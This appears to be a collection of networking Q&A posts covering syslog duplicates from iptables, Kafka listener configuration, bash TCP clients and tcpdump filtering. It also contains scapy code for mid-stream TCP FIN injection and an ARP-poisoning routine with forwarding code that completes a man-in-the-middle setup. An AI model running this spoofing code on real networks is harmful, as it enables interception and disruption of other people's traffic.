Duplicate log entries in Python UDP syslog server from iptables

I've implemented a basic remote syslog server in Python with the following code:
self.UDPsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPsock.bind(self.addr)
self.UDPsock.settimeout(1)
while self.carryOn:
    try:
        data = self.UDPsock.recv(self.buf)
        print data
    except socket.timeout:
        pass
I'm using this to receive log messages from my router (Tomato Shibby v108). I'm particularly interested in intercepting messages from my mobile so that I can create a "presence" script.
I originally tried the following iptables entry for testing:
iptables -I FORWARD -s 192.168.2.54 -m limit --limit 1/minute --limit-burst 1 -j LOG
This worked as expected and I would receive messages such as:
<12>Apr 1 21:51:47 kernel: IN=br0 OUT=ppp0 SRC=192.168.2.54 DST=17.158.8.77 LEN=70 TOS=0x00 PREC=0x00 TTL=63 ID=23055 DF PROTO=TCP SPT=60779 DPT=993 WINDOW=65535 RES=0x00 ACK PSH URGP=0 MARK=0x5
However, I don't want to rely on a static IP, so I changed the iptables filter to trigger on the MAC address:
iptables -t raw -A PREROUTING -m mac --mac-source SOURCE_MAC -m limit --limit 1/minute --limit-burst 1 -j LOG --log-ip-options
The problem here was that I now received >50 messages per log entry, all duplicates of the form:
<12>Apr 1 19:54:00 kernel: IN=br0 OUT= MAC=DEST_MAC:SOURCE_MAC:08:00 SRC=192.168.2.54 DST=224.0.0.251 LEN=101 TOS=0x00 PREC=0x00 TTL=255 ID=36530 PROTO=UDP SPT=5353 DPT=5353 LEN=81
When I changed the filter to:
iptables -t raw -A PREROUTING -m mac --mac-source SOURCE_MAC -m limit --limit 1/minute --limit-burst 1 -j LOG
It reduced the number of duplicates to 4:
<12>Apr 2 12:21:55 kernel: IN=br0 OUT= MAC=DEST_MAC:SOURCE_MAC:08:00 SRC=192.168.2.54 DST=224.0.0.251 LEN=101 TOS=0x00 PREC=0x00 TTL=255 ID=1384 PROTO=UDP SPT=5353 DPT=5353 LEN=81
Can anyone offer any insight into why this is happening? I'm assuming there is some sort of "funny" character that is causing this. Can I alter either the iptables entry or the Python program so that I only receive a single log entry per message?
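As a client-side workaround (it does not address the iptables root cause), the receive loop can suppress duplicates by remembering recently seen message bodies. A minimal sketch; the two-second window is an assumption, tune it to how tightly the duplicates cluster:

```python
import time

class Deduper:
    """Remember recently seen syslog lines and flag repeats."""

    def __init__(self, window=2.0):
        self.window = window   # seconds a message body stays "seen"
        self.last_seen = {}    # message body -> time of last receipt

    def is_new(self, msg, now=None):
        now = time.time() if now is None else now
        prev = self.last_seen.get(msg)
        # Refresh the timestamp even for duplicates, so a burst of
        # repeats keeps extending the suppression window.
        self.last_seen[msg] = now
        return prev is None or (now - prev) > self.window

# In the recv loop, act only on messages not seen recently:
#     data = self.UDPsock.recv(self.buf)
#     if dedup.is_new(data):
#         print data
```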

Related

Confluent_kafka Producer does not publish messages into topic

I tried to install Kafka on my Raspberry Pi and test it on the 'hello-kafka' topic:
~ $ /usr/local/kafka/bin/kafka-console-producer.sh --broker-list localhost:9092 --topic hello-kafka
>Test message 1
>Test message 2
>Test message 3
>^Z
[4]+ Stopped /usr/local/kafka/bin/kafka-console-producer.sh --broker-list localhost:9092 --topic hello-kafka
$ /usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic hello-kafka --from-beginning
Test message 1
Test message 2
Test message 3
^CProcessed a total of 3 messages
Then I tried to check that the server works from another machine.
Checking ZooKeeper:
(venv)$ telnet 192.168.1.10 2181
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
srvr
Zookeeper version: 3.6.0--b4c89dc7f6083829e18fae6e446907ae0b1f22d7, built on 02/25/2020 14:38 GMT
Latency min/avg/max: 0/0.8736/59
Received: 10146
Sent: 10149
Connections: 2
Outstanding: 0
Zxid: 0x96
Mode: standalone
Node count: 139
Connection closed by foreign host.
And Kafka:
(venv) $ telnet 192.168.1.10 9092
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
tets
Connection closed by foreign host.
Then I wrote a Python script:
# -*- coding: utf-8 -*-
from confluent_kafka import Producer
def callback(err, msg):
if err is not None:
print(f'Failed to deliver message: {str(msg)}: {str(err)}')
else:
print(f'Message produced: {str(msg)}')
config = {
'bootstrap.servers': '192.168.1.10:9092'
}
producer = Producer(config)
producer.produce('hello-kafka', value=b"Hello from Python", callback=callback)
producer.poll(5)
Here is the script output (no prints at all):
(venv) $ python kafka-producer.py
(venv) $ python kafka-producer.py
(venv) $
And no new messages in Kafka:
$ /usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic hello-kafka --from-beginning
Test message 1
Test message 2
Test message 3
^CProcessed a total of 3 messages
$ ^C
Can somebody tell me what I am doing wrong?
The correct fix is to update your broker configuration in server.properties to set the advertised listener correctly. If your client cannot resolve raspberrypi then change the advertised listener to something that your client can reach, i.e. the IP address:
advertised.listeners=PLAINTEXT://192.168.1.10:9092
Changing the /etc/hosts file on your client is a workaround that is fine for a test project with a Raspberry Pi, but as a general best practice it should be discouraged (the client will break as soon as it's moved to another machine which doesn't have the /etc/hosts hack).
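For reference, the relevant server.properties lines might look like the following (the 0.0.0.0 bind address is an assumption; adjust both lines to your setup):

```properties
# Bind on all interfaces, but advertise the address clients can reach
listeners=PLAINTEXT://0.0.0.0:9092
advertised.listeners=PLAINTEXT://192.168.1.10:9092
```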
I turned on logging and saw the following message:
WARNING:kafka.conn:DNS lookup failed for raspberrypi:9092, exception was [Errno 8] nodename nor servname provided, or not known. Is your advertised.listeners (called advertised.host.name before Kafka 9) correct and resolvable?
ERROR:kafka.conn:DNS lookup failed for raspberrypi:9092 (AddressFamily.AF_UNSPEC)
Then I added the following line to /etc/hosts on the client machine:
192.168.1.10 raspberrypi
And it completely fixed the situation.

TCP packet injection with python (scapy) in the mid-stream

I've been running in circles with the following scenario:
A client sends a GET request for a resource the size of a few full-MSS (1460-byte) TCP packets, let's say 6.
How do I force scapy to send a TCP segment with a FIN flag BEFORE all packets are delivered by the server, i.e. after packets 1, 2, 3, 4, 5?
I was trying a combination of simple curl requests in a loop and a Python/scapy script:
import os
from scapy.all import *
from time import sleep

os.system("iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP")
os.system("iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP")

def packet(pkt):
    if pkt[TCP].flags == 16:
        print('ACK packet detected port : ' + str(pkt[TCP].sport) + ' from IP Src : ' + pkt[IP].src)
        send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport, ack=pkt[TCP].seq + 1, flags='F'))

sniff(iface="ens160", prn=packet, filter="host 1.1.1.1", count=10)
But the segment carrying the FIN flag always arrives late and out of TCP seq/ack sync.
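One likely culprit is the sequence numbering: a FIN forged on the server's behalf has to continue the server's sequence space, and the client's own ACK tells you where that is. Stripped of scapy objects, the arithmetic looks like this (a sketch; fin_numbers and the dict are illustrative, not scapy API):

```python
def fin_numbers(client_pkt):
    """Given the seq/ack of a sniffed client ACK, return the (seq, ack)
    a spoofed server-side FIN should carry to stay in sequence.

    client_pkt['ack'] is the next byte the client expects from the
    server, so the forged FIN must start exactly there; its own ack
    field just echoes what the client has sent so far.
    """
    return client_pkt['ack'], client_pkt['seq']

# Example: the client last sent seq=1000 and has acknowledged the
# server's stream up to byte 5001.
seq, ack = fin_numbers({'seq': 1000, 'ack': 5001})
# seq == 5001, ack == 1000
```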

packet forwarding while ARP poisoning [in Windows]

I wanted to make a "proxy" while ARP poisoning. It works with UDP, and if I send a packet to Google I can see it on my PC using Wireshark.
def trick(gate_mac, victim_mac):
    '''Tricks the victim and the gateway, using ARP'''
    my_mac = ARP()
    my_mac = my_mac.hwsrc
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst=victim_ip, psrc=gate_ip, hwdst=victim_mac))
    sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst=gate_ip, psrc=victim_ip, hwdst=my_mac))
    print "TRICKED"
That is the function I wrote to ARP poison. Now I want to forward all the packets I get from the victim's PC to the router, but I have no clue how to do packet forwarding.
You can simply activate your OS packet forwarding. If you're running Linux, a simple sysctl -w net.ipv4.ip_forward=1 should do that.
You may also need to let the packets pass your firewall; something like iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT should work (if you're using Linux, again).
Under other OSes, you need to find out how to enable packet forwarding and if needed add firewall rules. If you cannot enable packet forwarding, you can run another Scapy script to forward packets for you. Here is an example:
VICTIM_MAC = "00:01:23:45:67:89"
GATEWAY_MAC = "00:98:76:54:32:10"

_SRC_DST = {
    GATEWAY_MAC: VICTIM_MAC,
    VICTIM_MAC: GATEWAY_MAC,
}

def forward_pkt(pkt):
    # Rewrite the destination MAC so the frame goes to the other side
    pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC)
    sendp(pkt)

sniff(
    prn=forward_pkt,
    filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC,
                                                      GATEWAY_MAC)
)

TCP client in bash

I have a TCP server written in Python and clients in bash.
The client sends data like this:
cat file > /dev/tcp/ip/port
and the Python server sends the response:
clientsocket.send('some response')
I can send my data to the server and it works fine, but when the server tries to send the response, my bash script blocks. I tried to use file descriptors like below:
exec 3<>/dev/tcp/ip/port
cat file >&3
RESPOND=`cat <&3`
echo $RESPOND
but it does not work (it still blocks).
Thanks in advance
Try using netcat or nc instead. You can set up a server to listen on port 1234 with
command=$(netcat -l 1234)
and you can transmit a message to that host on that port with
echo "message" | nc <host> 1234
or send a file with
nc <host> 1234 < someFile.txt
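For completeness, the block on the client side usually happens because `cat <&3` reads until EOF, and EOF only arrives when the server closes the connection. A minimal sketch of a Python server that replies and then closes (the port and the response body are assumptions):

```python
import socket

def serve_once(port):
    """Accept one connection, read the client's data, send a response,
    then close the socket -- the close() is what gives the bash
    client's `cat <&3` its EOF."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('127.0.0.1', port))
    srv.listen(1)
    conn, _ = srv.accept()
    conn.recv(4096)                 # read (part of) the request
    conn.sendall(b'some response')
    conn.close()                    # EOF -> the client's cat returns
    srv.close()
```

Without the close() (or a shutdown of the write side), `cat <&3` keeps waiting for more data, which matches the observed hang.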

Skip the IP headers with tcpdump

I'm using tcpdump to debug an SSDP service.
$ sudo tcpdump -Aq udp port 1900
When printing the UDP packets, I'm getting a lot of gibberish before the HTTP headers I presume to be the IP and UDP headers. How do I suppress printing these, and just print the application level data in the packet (which includes the HTTP headers)?
Here's an example, the stuff I don't want is prior to NOTIFY on the second line:
14:41:56.738130 IP www.routerlogin.com.2239 > 239.255.255.250.1900: UDP, length 326
E..b..#................l.N..NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
Sadly there are no tcpdump or even tshark shortcuts to do what you want... the best we can do is run STDOUT through a text filter...
Some perl or sed guy will probably come behind me and shorten this, but it gets the job done...
[mpenning@Bucksnort ~]$ sudo tcpdump -Aq udp port 1900 | perl -e 'while ($line=<STDIN>) { if ($line!~/239.255.255.250.+?UDP/) { if ($line=~/(NOTIFY.+)$/) {print "$1\n";} else {print $line;}}}'
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
[mpenning@Bucksnort ~]$
If you add line-breaks, the perl STDIN filter listed above is...
while ($line=<STDIN>) {
    if ($line!~/239.255.255.250.+?UDP/) {
        if ($line=~/(NOTIFY.+)$/) {
            print "$1\n";
        } else {
            print $line;
        }
    }
}
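The same filter can also be written in Python if perl isn't to your taste; a sketch mirroring the regexes above, reading line by line from stdin:

```python
import re
import sys

def filter_line(line):
    """Mirror of the perl filter: drop tcpdump's summary lines and
    strip the binary IP/UDP header bytes that precede NOTIFY."""
    if re.search(r'239\.255\.255\.250.+?UDP', line):
        return None                 # summary line: drop it
    m = re.search(r'(NOTIFY.*)$', line)
    return m.group(1) if m else line.rstrip('\n')

if __name__ == '__main__':
    for raw in sys.stdin:
        out = filter_line(raw)
        if out is not None:
            print(out)
```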
